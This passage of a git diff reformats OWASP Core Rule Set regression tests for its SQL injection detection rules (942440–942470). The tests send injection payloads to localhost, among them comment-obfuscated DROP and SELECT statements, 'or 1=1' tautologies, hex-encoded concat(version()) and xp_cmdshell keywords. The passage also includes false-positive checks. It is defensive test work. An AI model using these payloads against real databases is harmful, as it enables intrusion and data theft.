agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=admin'--" - output: - log_contains: id "942440" - - test_title: 942440-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log: + expect_ids: [942440] + - test_id: 5 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DROP/*comment*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + output: + log: + expect_ids: [942440] + - test_id: 6 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DR/**/OP/*bypass deny listing*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log: + expect_ids: [942440] + - test_id: 7 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" - output: - log_contains: id "942440" - - test_title: 942440-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log: + expect_ids: [942440] + - test_id: 8 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" - output: - log_contains: id "942440" - - test_title: 942440-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log: + expect_ids: [942440] + - test_id: 9 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1# " - output: - log_contains: id "942440" - - test_title: 942440-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log: + expect_ids: [942440] + - test_id: 10 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1-- -" - output: - log_contains: id "942440" - - test_title: 942440-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log: + expect_ids: [942440] + - test_id: 11 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=‘ or 1=1/*" - output: - log_contains: id "942440" - - test_title: 942440-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log: + expect_ids: [942440] + - test_id: 12 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=1='1' or-- -" - output: - log_contains: id "942440" - - test_title: 942440-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log: + expect_ids: [942440] + - test_id: 13 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!50000or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log: + expect_ids: [942440] + - test_id: 14 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' /*!or*/1='1" - output: - log_contains: id "942440" - - test_title: 942440-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log: + expect_ids: [942440] + - test_id: 15 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=0/**/union/*!50000select*/table_name`foo`/**/" - output: - log_contains: id "942440" - - test_title: 942440-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log: + expect_ids: [942440] + - test_id: 16 desc: "Avoid False Positive on JWT (body)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + log: + no_expect_ids: [942440] + - test_id: 17 desc: "Avoid False Positive on JWT (cookie)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - method: "POST" - port: 80 - version: "HTTP/1.1" - uri: "/post" - data: "foo=bar" - output: - no_log_contains: id "942440" - - test_title: 942440-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + log: + no_expect_ids: [942440] + - test_id: 18 desc: "Avoid False Positive on JWT (querystring)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" - output: - no_log_contains: id "942440" - - test_title: 942440-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + log: + no_expect_ids: [942440] + - test_id: 19 desc: "False positive against Facebook click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" - output: - no_log_contains: id "942440" - - test_title: 942440-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" + output: + log: + no_expect_ids: [942440] + - test_id: 20 desc: "False positive against Google click identifier" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - method: "GET" - port: 80 - version: "HTTP/1.1" - uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" - output: - no_log_contains: id "942440" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" + output: + log: + no_expect_ids: [942440] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 7d3203112..bf0f304cd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -1,92 +1,90 @@ --- meta: author: "William Woodson, azurit" - description: None - enabled: true - name: 942450.yaml +rule_id: 942450 tests: - - test_title: 942450-1 + - test_id: 1 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=%5c0xf00dsdfdsa" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 2 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-3 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 3 desc: "SQL Hex Encoding" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=select%200x616263" - version: HTTP/1.0 - output: - log_contains: id "942450" - - test_title: 942450-4 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log: + expect_ids: [942450] + - test_id: 4 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=IHRlc3Q0xAcF" - version: HTTP/1.0 - output: - no_log_contains: id "942450" - - test_title: 942450-5 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942450] + - test_id: 5 desc: "SQL Hex Encoding - negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" - version: HTTP/1.0 - output: - no_log_contains: id "942450" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942450] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 7d99328e2..9a2b72a23 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -1,41 +1,39 @@ --- meta: author: "Franziska Bühler, azurit" - description: None - enabled: true - name: 942460.yaml +rule_id: 942460 tests: - - test_title: 942460-1 + - test_id: 1 desc: "Repetitive Non-Word Characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo...." - version: HTTP/1.1 - output: - log_contains: id "942460" - - test_title: 942460-2 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo...." + version: HTTP/1.1 + output: + log: + expect_ids: [942460] + - test_id: 2 desc: "Repetitive Non-Word Characters negative test only 3 characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "var=foo..." - version: HTTP/1.1 - output: - no_log_contains: id "942460" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "var=foo..." + version: HTTP/1.1 + output: + log: + no_expect_ids: [942460] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index e2b679c1a..3496a13e4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -1,193 +1,191 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942470.yaml +rule_id: 942470 tests: - - test_title: 942470-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=nvarchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 2 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_cmdshell" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 3 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=varchar" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=varchar" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 4 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_dirtree" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 5 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xp_regread" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 6 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_password" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 7 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=UTL_HTTP" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 8 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=OPENROWSET" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 9 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 10 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - test_title: 942470-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sp_executesql" + version: HTTP/1.0 + output: + log: + expect_ids: [942470] + - test_id: 11 desc: "SQL Injection Attack: current_user" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: 